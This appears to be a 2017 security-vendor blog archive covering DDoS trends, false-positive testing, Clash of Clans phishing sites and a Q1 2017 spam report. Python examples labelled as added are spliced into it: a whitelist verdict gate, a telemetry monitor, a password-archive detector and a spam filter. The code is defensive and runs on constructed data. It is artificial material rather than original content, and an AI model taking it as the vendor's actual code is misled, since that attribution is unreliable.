The distribution of operating systems changed drastically in Q1: Windows-based DDoS bots surpassed the trendy new IoT bots, accounting for 59.81% of all attacks. This is the result of growing activity by bots belonging to the Yoyo, Drive and Nitol families, all of which were developed for Windows.

Correlation between attacks launched from Windows and Linux botnets, Q4 2016 and Q1 2017

The majority of attacks – 99.6% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.4% of cases. Attacks involving bots from three families were negligible.


Although the first quarter of 2017 was rather quiet compared to the previous reporting period, there were a few interesting developments. Despite the growing popularity of IoT botnets, Windows-based bots accounted for 59.81% of all attacks. Meanwhile, complex attacks that can only be repelled with sophisticated protection mechanisms are becoming more frequent.

In Q1 2017, not a single amplification attack was recorded, which suggests that their effectiveness has declined. We can assume that this type of attack is gradually becoming a thing of the past. Another trend evident this quarter is the rise in the number of encryption-based attacks. However, it cannot be described as significant yet.

False Positives: Why Vendors Should Lower Their Rates and How We Achieved the Best Results

Wed, 05/10/2017 - 10:14

In pursuit of a high cyberthreat detection rate, some developers of cybersecurity solutions neglect the subject of false positives, and unfairly so. Indeed, this is a very inconvenient matter that some developers tend to overlook (or try to solve with questionable methods) until there is a serious incident that could paralyze the work of their customers. Unfortunately, such incidents do happen. Regretfully, only then does it dawn on these developers that high-quality protection from cyberthreats involves not only prevention but also a low false-positive rate.

While minimizing the false-positive rate may seem simple enough, it in fact involves a multitude of intricacies and snags that demand significant investment, technological maturity, and resources from cybersecurity developers.

The two main reasons for false positives are:

  1. software, hardware, and human errors that all stem from the developer of the product, and
  2. the diversity of legitimate (“clean”) software that is being inspected.

The latter reason needs to be clarified.

It’s no secret that programs are written globally by millions of people with a plethora of varied qualifications (from students to experts), using various platforms and adhering to different standards. Every author has his own unique style, which sometimes leads to a situation where the program code resembles malicious code. This triggers protection technologies, especially those that are based upon low-level binary analysis using different approaches, including machine learning.

Without taking this peculiarity into account, and without implementing special technologies to minimize the occurrence of false positives, cybersecurity developers risk ignoring the “first, do no harm” principle. This, in turn, leads to disastrous consequences (especially for large corporate customers), comparable to the damage caused by cyberattacks.

For more than twenty years, Kaspersky Lab has been working on processes for development and testing as well as on creating technologies that minimize the rate of false positives. We take pride in having one of the best results in the industry (see tests performed by AV-Comparatives, or SE Labs) for false alarms, and we are glad to further expand on several specifics of our inner workings. I am sure that this information will allow users and corporate customers to have a more reasonable approach in selecting a cybersecurity solution. Additionally, cybersecurity developers will be able to improve and refine their processes to match the level of the world’s best practices.

We use a triple-tier quality-control system to minimize the rate of false positives, including:

  1. quality control at the design stage,
  2. quality control upon the release of a detection method, and
  3. quality control of released detection methods.

This system is being continuously improved with the help of various preventive measures.

Let us review each tier of the system in greater detail.

Quality control at the design stage

One of our fundamental principles in software development is that each technology, product, or process must contain mechanisms for minimizing the risk of false positives and the consequential faults that result from them. Mistakes at the design stage turn out to be the most costly, as correcting them comprehensively may require rewriting an entire algorithm. This is why, drawing on our years of experience, we have produced our own best practices that have allowed us to decrease the rate of false positives.

For example, when developing or improving machine learning-based cyberthreat detection technology, we make sure that the technology has been learning from considerable collections of clean files with different formats. Our knowledge base for clean files (a whitelist) assists us with that. The contents of the whitelist have already exceeded 2 billion objects and are constantly collaboratively updated.

During our work, we also make sure that training and test collections of each technology are regularly updated with the most recent versions of clean files. Additionally, our products contain built-in features that minimize false positives for critical system files. Aside from that, at each detection, the product utilizes the Kaspersky Security Network (KSN) to consult the whitelist database and the certificate-reputation service to confirm that the detected file is not a clean one.
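The ordering of checks described in the two paragraphs above can be shown as a small verdict gate. The code below is an added example, not Kaspersky Lab code: a heuristic score is only allowed to become a blocking verdict after an exact-hash whitelist and a signer-reputation list have been consulted, and an unknown file in a critical system location goes to an analyst instead of being blocked. The threshold, the sample files and the reputation data are all constructed for the example.

```python
# Added example (not Kaspersky Lab code): a verdict gate that consults a
# whitelist, a signer-reputation list and a critical-path list before a
# heuristic detection may block a file. All data here is constructed.
import hashlib
from dataclasses import dataclass
from enum import Enum
from typing import Optional, Set


class Verdict(Enum):
    CLEAN = "clean"              # heuristic did not fire
    SUPPRESSED = "suppressed"    # fired, but the file is known to be clean
    REVIEW = "analyst-review"    # fired on an unknown critical system file
    BLOCK = "block"              # fired, no evidence of cleanliness


@dataclass(frozen=True)
class FileInfo:
    path: str
    content: bytes
    signer: Optional[str]     # subject of a verified code-signing certificate
    heuristic_score: float    # 0..1, output of a (simulated) ML detector


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for the whitelist and certificate-reputation services.
SAMPLE_CLEAN_BINARY = b"constructed: bytes of a whitelisted OS component"
KNOWN_CLEAN_HASHES: Set[str] = {sha256(SAMPLE_CLEAN_BINARY)}
TRUSTED_SIGNERS: Set[str] = {"Example OS Vendor", "Example Office Vendor"}
CRITICAL_PREFIXES = ("C:\\Windows\\System32\\", "/usr/lib/", "/bin/")
BLOCK_THRESHOLD = 0.8  # assumed cut-off for the heuristic score


def gate(f: FileInfo) -> Verdict:
    """Turn a raw heuristic score into a final verdict.

    Order matters: the cheapest and most reliable evidence of cleanliness
    (an exact hash match) is consulted first, then signer reputation, and
    only then does the file's location decide between auto-block and review.
    """
    if f.heuristic_score < BLOCK_THRESHOLD:
        return Verdict.CLEAN
    if sha256(f.content) in KNOWN_CLEAN_HASHES:
        return Verdict.SUPPRESSED
    if f.signer is not None and f.signer in TRUSTED_SIGNERS:
        return Verdict.SUPPRESSED
    if f.path.startswith(CRITICAL_PREFIXES):
        # An unknown file in a critical location: a wrong block here can
        # leave the host unbootable, so an analyst decides instead.
        return Verdict.REVIEW
    return Verdict.BLOCK


def demo() -> dict:
    """Constructed files exercising every branch of the gate."""
    samples = {
        "whitelisted_os_file": FileInfo("C:\\Windows\\System32\\example.dll",
                                        SAMPLE_CLEAN_BINARY, None, 0.95),
        "signed_vendor_tool": FileInfo("C:\\Program Files\\Tool\\tool.exe",
                                       b"constructed signed tool",
                                       "Example Office Vendor", 0.90),
        "unknown_system_file": FileInfo("C:\\Windows\\System32\\odd.dll",
                                        b"constructed unknown dll", None, 0.90),
        "unknown_download": FileInfo("C:\\Users\\u\\Downloads\\invoice.exe",
                                     b"constructed dropper",
                                     "Unknown Signer Ltd", 0.97),
        "low_score_file": FileInfo("C:\\Users\\u\\notes.txt",
                                   b"constructed text", None, 0.10),
    }
    return {name: gate(f).value for name, f in samples.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:22s} -> {verdict}")
```

The point of the ordering is cost and reliability: a hash lookup is cheap and definitive, a signer check needs certificate validation, and the location rule exists only to keep an unbootable host out of the set of possible outcomes when the other two sources are silent.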

However, technologies and products aside, there is also a human factor.

A cybersecurity analyst, a developer of an expert system, or a data analyst might make mistakes at any stage. So there is room for independent blocking checks by additional automated systems.

Quality control at the release of a detection method

Before the delivery to users, new methods of cyberthreat detection pass several more test stages.

The greatest protective barrier is the infrastructure system for false positive testing, which works with two collections.

The first collection, which is a critical set, comprises files that are taken from popular operating systems (released for different platforms with different localizations), updates of those systems, office applications, drivers, and our own products. This set of files is routinely supplemented.

The second collection contains a dynamically formed set of files, which includes the most popular files. The size of this collection is chosen by finding a balance between the volume of scanned files (as a consequence, the number of servers), the run time of this scan (hence, the time of delivery of detection methods to users), and the number of potentially affected computers in case of a false positive.

For the time being, the number of files in both collections surpasses 120 million (this is approximately 50 TB of data). Considering the fact that these files are scanned every hour after each release of the database updates, we may infer that the infrastructure checks over 1.2 PB of data for false positives each day.

More than 10 years ago, we were among the first ones in the field of cybersecurity to implement non-signature-based methods of detection that leveraged behavioral analysis, machine learning, and other promising generic technologies. These methods have proven their effectiveness, especially in overcoming sophisticated cyberthreats. However, they require particularly thorough testing for false positives.

For example, behavioral detection allows for the neutralization of a malicious application that has manifested some traits of malicious behavior during its operation. In order to prevent a false positive for the behavior of clean files, we have created a “farm” of computers that reproduce various user scenarios.

The “farm” offers different combinations of operating systems and popular software. Before releasing each new non-signature-based detection method, we dynamically check it at this “farm” with standard and unique scenarios.

Last but not least, cybersecurity developers should also pay attention to testing their web scanners for false positives. A website blocked by mistake can also disrupt the work of a customer, which is not acceptable.

To minimize the number of such incidents, we have developed automated systems to download up-to-date content daily from 10,000 of the most popular websites and scan this content to test for false positives. The most accurate results are achieved by using the most popular versions of common browsers and by using proxies in different geo locations to exclude location-dependent content.

Quality control of released detection methods

Detection methods that have been delivered to users are monitored day and night by automated systems that watch for any behavioral anomalies.

The thing is, the dynamics of a detection that triggers a false positive often differ from the dynamics of a detection of a genuinely malicious file. Our automated system monitors these anomalies, and if there is something suspicious, the system asks an analyst to run an additional check on this detection. If suspicions are very strong, then our automated system turns off the detection method through KSN and immediately informs analysts about it. In addition, there are three teams of cybersecurity analysts on duty in Seattle, Beijing, and Moscow who work shifts around the clock to monitor the situation and quickly resolve emerging incidents. This is Humachine Intelligence in action.

In addition to detecting anomalies, the automated systems monitor performance data, errors in module operation, and potential problems based on diagnostic data received from users over KSN. This allows us to detect potential problems at early stages and eliminate them before their effect becomes noticeable for users.

If an incident does occur after all and cannot be closed by disabling an individual detection method, then urgent actions are taken to rectify the situation and allow the problem to be solved quickly and effectively. In this case, we may roll back the databases to a stable release that does not require any additional testing. To be honest, we have not resorted to this method in practice, as there has been no occasion for that thus far. In fact, we’ve only ever used it during our training exercises.
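The anomaly the text describes has a recognizable shape in telemetry: a record that suddenly fires on files that are old, widespread or already whitelisted, rather than on the new and rare files that genuine malware consists of. The following is an added example, not Kaspersky Lab’s system: it groups constructed detection events by record, measures what share of the hits look like hits on clean files, and maps that share onto the escalation ladder in the paragraphs above (analyst check, then automatic disabling with notification). The thresholds and the telemetry are assumed values built for the example.

```python
# Added example (not Kaspersky Lab code): a post-release monitor for
# detection records. Thresholds and telemetry are constructed.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class DetectionEvent:
    record: str          # database record (detection method) that fired
    host_id: str
    file_sha256: str
    file_age_days: int   # how long the reputation cloud has known the file
    prevalence: int      # number of hosts that have this file
    whitelisted: bool    # file was on the whitelist at the time of the hit


# Assumed tuning values.
MIN_HITS = 20          # below this there is too little data to judge
ESCALATE_RATIO = 0.5   # share of clean-looking hits that wakes an analyst
DISABLE_RATIO = 0.9    # share that disables the record outright
OLD_DAYS = 30
POPULAR = 10_000


def looks_clean(ev: DetectionEvent) -> bool:
    """A hit on a whitelisted, or old and popular, file is what a false
    positive usually looks like; fresh malware is new and rare."""
    return ev.whitelisted or (ev.file_age_days >= OLD_DAYS and ev.prevalence >= POPULAR)


def assess(events: Iterable[DetectionEvent]) -> Dict[str, str]:
    """Return one action per record: 'ok', 'escalate' or 'disable+notify'."""
    hits: Dict[str, int] = defaultdict(int)
    suspect: Dict[str, int] = defaultdict(int)
    for ev in events:
        hits[ev.record] += 1
        if looks_clean(ev):
            suspect[ev.record] += 1
    actions: Dict[str, str] = {}
    for record, n in hits.items():
        if n < MIN_HITS:
            actions[record] = "ok"
            continue
        ratio = suspect[record] / n
        if ratio >= DISABLE_RATIO:
            actions[record] = "disable+notify"   # turned off via the cloud, analysts paged
        elif ratio >= ESCALATE_RATIO:
            actions[record] = "escalate"         # analyst re-checks the record
        else:
            actions[record] = "ok"
    return actions


def constructed_telemetry() -> List[DetectionEvent]:
    events: List[DetectionEvent] = []
    # A genuine detection: 25 hosts hit fresh, rare files.
    for i in range(25):
        events.append(DetectionEvent("Trojan.Example.gen", f"host-{i}",
                                     f"fresh-{i:02d}", 1, 3, False))
    # A false positive: one old, ubiquitous, whitelisted library on 40 hosts.
    for i in range(40):
        events.append(DetectionEvent("HEUR:Suspicious.Example", f"host-{i}",
                                     "shared-lib", 400, 2_000_000, True))
    # A borderline record: 20 hits, 12 of them on old, popular files.
    for i in range(20):
        old = i < 12
        events.append(DetectionEvent("Generic.Example.ml", f"host-{i}",
                                     f"mixed-{i:02d}", 365 if old else 2,
                                     50_000 if old else 10, False))
    # Too few hits to judge yet, even though they all look clean.
    for i in range(5):
        events.append(DetectionEvent("Exploit.Example.a", f"host-{i}",
                                     "rare", 500, 1_000_000, True))
    return events


if __name__ == "__main__":
    for record, action in assess(constructed_telemetry()).items():
        print(f"{record:26s} {action}")
```

The minimum-hit guard matters as much as the ratios: a record that has fired five times on whitelisted files is not yet evidence of anything, and disabling records on tiny samples would trade false positives for false negatives.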

Speaking of training exercises…

Prevention is better than a cure

Not everything can be foreseen, and even if every eventuality were provided for, it would be good to know how certain measures would work in practice. Waiting for a real incident to happen isn’t necessary, as there is always the option of modeling.

Periodically, we conduct internal training exercises to confirm the “combat readiness” of our staff and the effectiveness of our methods for preventing false positives.

The training exercises are focused on a full-blown imitation of diverse emergency scenarios in order to see whether all of the systems and experts act according to plan. Several divisions of technical and service departments are simultaneously involved in the training exercises. These exercises are scheduled for weekends and are based on a scrupulously thought-out scenario.

After training, we analyze each division for its performance, improve the documentation and implement changes for the involved systems and processes.

Sometimes during the training process, we discover new risks that had previously gone unnoticed. A more systematic discovery of those risks is achieved through brainstorming potential problems in the areas of technologies, processes and products. After all, technologies, processes, and products are constantly being developed, and any change brings about new risks.

Finally, we work systematically on eradicating root causes for all of the incidents, risks, and problems that were uncovered during our training exercises.

It goes without saying that all of the systems that are responsible for quality control are duplicated and are maintained day and night by the team of experts on duty. A fault in any one system will lead to transitioning over to a duplicate system while the fault itself is immediately addressed.


False positives cannot be avoided completely, but it is possible to lower their rate considerably to minimize their aftermath. This does require substantial investments, technological maturity, and resources from developers of cybersecurity solutions. Yet, these efforts provide a smooth experience for our users and corporate clients. These efforts are imperative and are within the scope of duties of each reliable developer.

Reliability is our creed. Instead of relying on one protection technology, we employ a multi-tier security approach. Protection against false positives is arranged in the same way – it is multi-tiered and duplicated multiple times. There is no other way since we are talking about the high-quality protection of our customers’ infrastructure.

At the same time, we succeed in finding and maintaining the optimal balance between the highest level of protection against cyberthreats and the lowest level of false positives. This is confirmed by the results of independent tests in 2016:, a German test laboratory, gave Kaspersky Endpoint Security eight awards at the same time, including Best Protection 2016 and Best Usability 2016.

In conclusion, I would like to note that high quality is not a result that ought to be achieved only once. This is a process that requires constant supervision and improvement, especially where the price of a possible mistake means the disruption of a customer’s business processes.

Clash of Greed

Thu, 05/04/2017 - 04:57

In 2015, the game Clash of Clans was bringing in about 1.5 million dollars per day for its developer, Supercell. Later on, the company launched a new project, Clash Royale, after addressing the flaws of their first game and implementing battles with real players in the new game, which shares the same characters and the same cartoonish design as the first project. Yet, the more popular a game is, the higher the probability that fraudsters will be looking to make a fortune on that popularity by, for example, organizing phishing attacks on the player base.

The money-making model for both of the games has been thoroughly thought-out: anyone can play without investing real money. But this would mean putting a lot of effort into the games and losing more often to other players who basically purchase and upgrade either rare and strong cards with extremely low drop rates or battle units and building levels (when talking about Clash of Clans). In this regard, the majority of the game’s players do not have much money but are full of ambition. These players often seek not-so-legal ways to procure and upgrade rare cards to put less effort into winning battles and ranking up to play in the premier leagues.

This has been exploited by fraudsters, who subtly abuse human foibles such as cupidity, love for freebies, and the desire to be the top player. Phishing attacks, though always quite similar in their nature, are very competently planned. Phishing websites are designed with holidays in mind (either New Year’s Eve or Christmas) or are linked to game updates that include additions to the game or changes in the game’s mechanics (new cards, units, balancing, etc.).

Here, for example, is the headline of a phishing website targeted at Clash of Clans players. It was designed specially for New Year’s Eve, and, according to the published description, the developer of the game supposedly gives out New Year’s gifts to players, including game currency, building level upgrades, etc.

The address of the website contains the phrase “eventchristmasandnewyear”, which makes the website look even more credible.

Victims can choose what they want from a list that includes gold, crystals, resources, and building upgrades.

The intention of the fraudsters becomes obvious as early as the next step, where victims are prompted to fill out a form by entering the credentials of their Google and Facebook accounts. After that, these credentials are passed on to the fraudster and the victims are robbed of both accounts.

The form created by the fraudsters offers “authorization” with Google and Facebook credentials

Also, fraudsters reacted quickly to the release of the latest updates, which included new battle arenas and legendary cards. On behalf of Supercell, players were offered their choice of one of the “legendaries”, as well as gold and crystals. Of course, in order to obtain these, Google and Facebook credentials were required.

One of their recent releases was “a gift from the developers”, which gives the player the option of selecting their desired hero or resources

Input fields for credentials

After sending the credentials, the victim receives a message to confirm their registration. It can be assumed that the evildoers may need this to ascertain the authenticity of the user-specified credentials.

To avoid falling victim to this fraudulent scheme, it is a good idea to follow these simple rules: do not use any links from social network groups, especially if the groups are not official, or from e-mail messages received from unknown users, even though they may promise you progress in the game or imminent profit. It certainly couldn’t hurt to install good security software that features anti-phishing functionality with database updates on malicious and phishing links that cover every subject. If the “free lunch” being offered proves to be too tempting, then go to the game developer’s official website and verify whether the holiday offer is genuine.

Spam and phishing in Q1 2017

Tue, 05/02/2017 - 04:57

Spam: quarterly highlights

Spam from the Necurs botnet

We wrote earlier about a sharp increase in the amount of spam with malicious attachments, mainly Trojan encryptors. Most of that spam was coming from the Necurs botnet, which is currently considered the world’s largest spam botnet. However, in late December 2016, the network’s activity almost ceased completely and, as time showed, it wasn’t just a break for the festive season. The volume of spam sent from this botnet remained at an extremely low level for almost the entire first quarter of 2017.



Why has Necurs stopped distributing spam? We know that the botnet is active and the bots are waiting for commands. Perhaps the criminals behind the botnet got scared by all the fuss made about encryptors and decided to temporarily suspend their mass mailings.

We still continue to register malicious mass mailings from what is presumably the Necurs botnet, though their volume is a fraction of the amount recorded in December:

The number of malicious messages caught by our traps that were presumably sent by the Necurs botnet

As before, the emails usually imitate various types of bills and other official documents:

The email above contained an attached MSWord document with macros that downloaded the Rack family encryptor (detected as Trojan.NSIS.Sod.jov) to the victim machine.

In addition to malicious mailings from the botnet, we came across a mass mailing about pump-and-dump stock schemes:

As a rule, mass mailings exploiting this subject are distributed in huge volumes over a very short period of time. This is because the fraudsters have to pump and dump shares quickly, before their scams are discovered on the stock exchange. This type of stock fraud is against the law, so cybercriminals try to wind up the affair within a couple of days. The Necurs botnet is ideal for this sort of scam due to its size – according to estimates, it currently exceeds 200,000 bots.



Does this sharp drop mean we have reached peak crypto-spam mass mailing and it’s about to disappear? Unfortunately, no.

The total volume of malware detected in email decreased, but not that dramatically – 2.4 times less than the previous quarter.

The number of email antivirus detections, Q4 2016 vs Q1 2017

Malicious mass mailings are still being sent out and, although their volume has decreased, cybercriminals are using a variety of techniques to deceive both security solutions and users.

Malicious emails with password-protected archives

In the first quarter we observed a trend towards packing malware into password-protected archives to complicate detection of malicious emails.

All the classic tricks were used to make potential victims open the archives: fake notifications about orders from large stores, various bills, money transfers, resumes, or the promise of lots of money.

The attached archives usually contained office documents with macros or JavaScript scripts. When launched, the files downloaded other malicious programs onto the user’s computer. Interestingly, after the decline in Necurs botnet activity, the harmful “payload” that spread via spam became much more diverse. The cybercriminals sent out ransomware and spyware, backdoors and a new modification of the infamous Zeus Trojan.

The attachments above contain Microsoft Word documents with macros that download several different modifications of a Trojan encryptor belonging to the Cerber family from onion domains in different zones. This malicious program selectively encrypts data on the user’s computer and demands a ransom for decrypting it via a site on the Tor network.

The archive in the message above contains the Richard-CV.doc file with macros that download representatives of the Fareit spyware family from the domain. These malicious programs collect confidential information about the user and send it to a remote server.

There was yet another case involving downloadable spyware, this time from the Pinch family. The Trojan collects passwords, email addresses, information about the system configuration and registry settings. Among other things, it harvests information from instant messaging services and mail clients. The obtained data is encrypted and sent to the criminals by email. According to our information received from KSN, the program is most widespread in Russia, India and Iran.



It’s worth pointing out that this spyware was spread using fake business correspondence. Emails were sent out using the names of real small and medium businesses with all the relevant signatures and contacts, rather than using the name of some made-up organization.

Unlike other emails, the example above does not contain a password-protected archive. The request to enter a password is just a trick: the fraudsters want the user to enable Microsoft Word macros to run the malicious script.

The contents of the email above include a password-protected document with a script in Visual Basic that downloads the Andromeda bot onto the victim machine. The latter establishes a connection with the command center and waits for commands from its owners. It has broad functionality and can download other malicious programs onto the user’s computer.

This fake notification from an e-store contains a malicious script. On entering the password and launching the malicious content, the Receipt_320124.lnk file is created in the %TEMP% folder. It, in turn, downloads a Trojan-banker of the Sphinx family, a modification of the older and infamous Zeus, onto the victim computer.

As we can see, very different mass mailings with malicious attachments now contain files packed in a password-protected archive. Most likely, this trend will continue: a password-protected document is likely to appear more trustworthy to the user, while causing problems for security solutions.
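The security-solution side of this trend is worth making concrete. A ZIP archive encrypts member data but not its central directory, so a gateway can still read the member names and the encrypted flag without the password; combined with a password quoted in the message body, that is enough for a scoring rule. The code below is an added example, not from the original post and not a Kaspersky Lab product: it builds constructed archives in memory, sets the encryption flag bit on them to stand in for a real password-protected archive, and scores three constructed messages including the one-document trick in which the “password” prompt is only a lure to enable macros. The weights are assumed.

```python
# Added example (not from the original post): a gateway heuristic for
# password-protected archives carrying office/script files. Archives,
# message bodies and weights are constructed for the example.
import io
import re
import struct
import zipfile
from typing import Dict, List, Tuple

RISKY_NAME = re.compile(r"\.(docm?|xlsm?|pptm?|js|jse|vbs|vbe|wsf|hta|lnk)$", re.I)
PASSWORD_HINT = re.compile(r"\bpassword\b\s*(?:is|:)?\s*\S+", re.I)


def archive_members(data: bytes) -> Tuple[bool, List[str]]:
    """Return (is_encrypted, member names).

    ZIP encrypts member data, not the central directory, so names can be
    read without the password; bit 0 of the general-purpose flags marks
    an encrypted member.
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
        return any(zi.flag_bits & 0x1 for zi in infos), [zi.filename for zi in infos]


def score_message(body: str, attachment: bytes) -> Dict[str, object]:
    encrypted, names = archive_members(attachment)
    password_in_body = PASSWORD_HINT.search(body) is not None
    risky = [n for n in names if RISKY_NAME.search(n)]
    score, reasons = 0, []
    if encrypted:
        score += 2; reasons.append("encrypted archive")
    if password_in_body:
        score += 1; reasons.append("password mentioned in body")
    if encrypted and password_in_body:
        score += 2; reasons.append("archive password supplied in the same mail")
    if risky:
        score += 3; reasons.append("office/script member: " + ", ".join(risky))
    action = "quarantine" if score >= 5 else "flag" if score >= 2 else "deliver"
    return {"encrypted": encrypted, "members": names, "score": score,
            "reasons": reasons, "action": action}


def build_zip(names: List[str], mark_encrypted: bool) -> bytes:
    """Constructed test archive. With mark_encrypted, bit 0 of the
    general-purpose flags is set in every local header and central-directory
    entry, which is what readers use to decide a member is encrypted."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n in names:
            zf.writestr(n, b"constructed placeholder content")
    data = bytearray(buf.getvalue())
    if mark_encrypted:
        # local header: flags at offset 6; central directory entry: offset 8
        for sig, flag_off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = data.find(sig)
            while pos != -1:
                (flags,) = struct.unpack_from("<H", data, pos + flag_off)
                struct.pack_into("<H", data, pos + flag_off, flags | 0x1)
                pos = data.find(sig, pos + len(sig))
    return bytes(data)


def demo() -> Dict[str, str]:
    """Three constructed messages: the quoted-password archive, the
    'password' lure on a plain document, and a harmless PDF."""
    cases = {
        "encrypted_doc_with_password": ("Please find the invoice attached. Password: inv2017",
                                        build_zip(["Invoice_2017.doc"], True)),
        "plain_doc_password_trick": ("Open the attached CV, password is in the document",
                                     build_zip(["Richard-CV.doc"], False)),
        "plain_pdf": ("Quarterly report attached.", build_zip(["report.pdf"], False)),
    }
    return {k: str(score_message(b, a)["action"]) for k, (b, a) in cases.items()}


if __name__ == "__main__":
    for name, action in demo().items():
        print(f"{name:28s} -> {action}")
```

Because the member names are visible, the rule does not need to crack anything: an encrypted archive whose only member is a Word document, shipped with its own password, is scored on structure alone, and the sandbox can be reserved for the cases the gateway cannot decide.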

Spam via legal services

Modern virtual platforms for communication (messengers, social networks) are also actively used by spammers to spread advertising and fraudulent offers. Cybercriminals register special accounts for spamming in social networks, and to make their messages look more authentic they use techniques similar to those used in traditional mass mailings (for example, the personal data in the account and in the email are the same). The same types of spam, for example ‘Nigerian letters’, offers of earnings, etc., can be distributed via email traffic and via social networks. A notification about a message is usually sent to the recipient’s email address; in this case, the technical headers of the email are legitimate, and it is only possible to detect the spam by the contents of the message. Spam distributed directly via email can be easily detected by its technical headers. The same cannot be said for messages sent via legitimate services, especially if the address of the service is added to the user’s list of trusted addresses.

Today’s email spam filters can cope effectively with the task of detecting spam that is sent in the traditional way, so spammers are forced to look for new methods to bypass filters.
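The two paragraphs above describe a filter pipeline with a header stage and a content stage, and the reason the second stage cannot be dropped. The following is an added example, not code from the original post: three constructed messages go through a header check that reads the Authentication-Results header written by the receiving MX (SPF and DKIM results plus From/envelope alignment) and then, for anything the headers do not reject, through a small weighted lexicon for advance-fee text. The relayed notification carries the same text as the direct spam but passes SPF and DKIM because a legitimate service really did send it, so only the content stage catches it. Header layout, lexicon weights and the sample messages are assumptions built for the example.

```python
# Added example (not from the original post): a two-stage spam filter
# showing why a notification from a legitimate service must be judged on
# content. Messages, lexicon and weights are constructed.
import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from typing import Dict, Optional

ADVANCE_FEE_PATTERNS = {   # assumed weights for a small advance-fee lexicon
    r"\bnext of kin\b": 3,
    r"\bbeneficiary\b": 2,
    r"\d[\d,.]*\s*(?:million|usd|dollars)\b": 2,
    r"\bconfidential\b": 1,
    r"\btransfer\b": 1,
    r"\d+\s*%": 1,
    r"\bbank (?:account )?details\b": 2,
}
CONTENT_THRESHOLD = 5


def _result(auth_results: str, method: str) -> str:
    m = re.search(rf"\b{method}=(\w+)", auth_results)
    return m.group(1).lower() if m else "none"


def header_stage(msg: Message) -> str:
    """'pass', 'reject' or 'neutral', from the Authentication-Results header
    that our own MX stamped on the message."""
    ar = msg.get("Authentication-Results", "")
    spf, dkim = _result(ar, "spf"), _result(ar, "dkim")
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    m = re.search(r"smtp\.mailfrom=(?:[^\s;@]+@)?([\w.-]+)", ar)
    aligned = bool(m) and m.group(1).lower() == from_domain
    if spf == "fail" or dkim == "fail":
        return "reject"
    if spf == "pass" and dkim == "pass" and aligned:
        return "pass"
    return "neutral"


def content_stage(text: str) -> int:
    low = text.lower()
    return sum(w for pat, w in ADVANCE_FEE_PATTERNS.items() if re.search(pat, low))


def classify(raw: str) -> Dict[str, object]:
    msg = message_from_string(raw)
    header = header_stage(msg)
    if header == "reject":
        return {"header": header, "content_score": None, "decision": "reject:headers"}
    body = msg.get_payload() if not msg.is_multipart() else ""
    score = content_stage(str(body))
    decision = "spam:content" if score >= CONTENT_THRESHOLD else "deliver"
    return {"header": header, "content_score": score, "decision": decision}


LETTER = ("Dear friend, I am the next of kin of a late client who left USD 12.5 million "
          "in a bank. This is strictly confidential. Send your bank details so we can "
          "transfer 30% to you.")

# Constructed: sent directly from a bulk sender, SPF fails.
DIRECT_SPAM = f"""\
From: "Barrister Ade" <ade@law-office.test>
To: victim@example.net
Subject: Confidential business proposal
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=bulk@mass-sender.test; dkim=none
Content-Type: text/plain; charset=utf-8

{LETTER}
"""

# Constructed: the same text relayed as a message notification by a real service.
VIA_SERVICE = f"""\
From: "Social Example" <notify@social.example>
To: victim@example.net
Subject: You have a new message
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=notify@social.example; dkim=pass header.d=social.example
Content-Type: text/plain; charset=utf-8

Barrister Ade sent you a message:

{LETTER}
"""

# Constructed: a benign notification from the same service.
FRIEND_REQUEST = VIA_SERVICE.split("\n\n")[0] + \
    "\n\nAlice wants to connect with you on Social Example. View profile.\n"


if __name__ == "__main__":
    for name, raw in (("direct", DIRECT_SPAM), ("via service", VIA_SERVICE),
                      ("friend request", FRIEND_REQUEST)):
        print(f"{name:15s} {classify(raw)}")
```

Whitelisting the service’s address, as the text notes, would switch off even the content stage for that sender, which is exactly why trusted-sender lists should exempt a sender from header-based rejection only, never from content scoring.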

Holidays and spam

The first quarter of 2017 saw festive spam dedicated to New Year, St. Patrick’s Day, Easter and Valentine’s Day. Small and medium-sized businesses advertised their services and products and offered holiday discounts. Offers from Chinese factories were timed to coincide with the Chinese New Year, which was celebrated in mid-February.

Spammers also sent out numerous offers to participate in a survey and get coupons or gift cards from major online stores, hoping to collect the recipients’ personal information and contact details.

Burst of B2B spam

In the first three months of 2017, we also recorded a large number of mass mailings containing offers to buy company databases from specific industries. This type of spam remains popular with spammers and primarily targets companies or individual representatives of large businesses rather than ordinary users. Therefore, these messages are sent mainly to people or companies from a list of contacts or addresses for a particular business segment that is obtained, as a rule, in the same way – via spam.

The offers are sent on behalf of firms or their representatives, but they are often completely impersonal.

Spammers have databases of companies for any business segment, as well as the contact details of participants at major exhibitions, seminars, forums and other events. To make recipients interested in their offers, spammers often send several free contacts from their collections.

Statistics

Proportion of spam in email traffic

Percentage of spam in global email traffic, Q4 2016 and Q1 2017

Compared to Q4 2016, there was a decline in the overall proportion of spam in global email traffic in the first three months of 2017. In January, the proportion fell to 55.05%, while in February the share was even lower – 53.4%. However, in March the level of spam showed an upward trend, rising to 56.9%. As a result, the average share of spam in global email traffic for the first quarter of 2017 was 55.9%.

Percentage of spam in Russia’s email traffic, Q4 2016 and Q1 2017

The spam situation in the Russian segment of the Internet was somewhat different from the global one. In January 2017, the proportion of junk email increased to almost 63% and stayed in the 60-63% range until the end of the quarter. In February, as was the case with overall global traffic, there was a decline – to 60.35% – followed by an increase to 61.65% in March. The average share of spam in Russian email traffic in the first quarter of 2017 was 61.66%.

Sources of spam by country

Sources of spam by country, Q1 2017

In the first quarter of 2017, the US remained the leading source of spam – its share accounted for 18.75%. Representatives from the Asia-Pacific region – Vietnam (7.86%) and China (7.77%) – came second and third.



Germany was the fourth biggest source, responsible for 5.37% of world spam, followed by India (5.16%). Russia, in sixth place, accounted for 4.93% of total spam.

The top 10 biggest sources also included France (4.41%), Brazil (3.44%), Poland (1.90%) and the Netherlands (1.85%).

Spam email size

Breakdown of spam emails by size, Q4 2016 and Q1 2017

